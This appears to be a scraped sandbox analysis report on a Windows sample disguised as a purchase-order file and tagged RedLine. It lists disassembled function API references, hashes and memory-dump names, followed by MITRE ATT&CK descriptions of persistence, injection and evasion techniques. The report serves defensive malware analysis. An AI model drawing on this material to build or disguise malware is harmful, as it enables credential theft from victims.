Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768

Function 004515AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004515DA
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA

Strings

edit, xrefs: 00451651

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729

Function 00474827 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00474833
GlobalMemoryStatusEx.KERNEL32 ref: 00474846

Strings

@, xrefs: 0047483E

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F

Function 004647A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(?), ref: 004647C7
htons.WSOCK32(?,?), ref: 00464827

Strings

255.255.255.255, xrefs: 004647DC

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E

Function 004694DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547

Strings

ListBox, xrefs: 00469512
ComboBox, xrefs: 004694E9

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend_wcslen
String ID: ComboBox$ListBox
API String ID: 455545452-1403004172
Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A

Function 00442AFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C

Strings

<local>, xrefs: 00442B48

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: InternetOpen
String ID: <local>
API String ID: 2038078732-4266983199
Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766

Function 004695F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660

Strings

ListBox, xrefs: 0046962B
ComboBox, xrefs: 00469602

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend_wcslen
String ID: ComboBox$ListBox
API String ID: 455545452-1403004172
Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA

Function 0046956F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6

Strings

ListBox, xrefs: 004695A3
ComboBox, xrefs: 0046957A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend_wcslen
String ID: ComboBox$ListBox
API String ID: 455545452-1403004172
Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA

Function 004560AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

wsprintfW.USER32 ref: 004560E9

Strings

%d/%02d/%02d, xrefs: 004560E3

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend_mallocwsprintf
String ID: %d/%02d/%02d
API String ID: 1262938277-328681919
Opcode ID: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
Opcode Fuzzy Hash: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA

Function 00442262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F

Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287

Strings

Shell_TrayWnd, xrefs: 00442265

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358

Function 0044222A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
PostMessageW.USER32(00000000), ref: 00442247

Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287

Strings

Shell_TrayWnd, xrefs: 00442239

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358

Function 00439514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522

Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B

Strings

AutoIt, xrefs: 00439516
Error allocating memory., xrefs: 0043951B

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

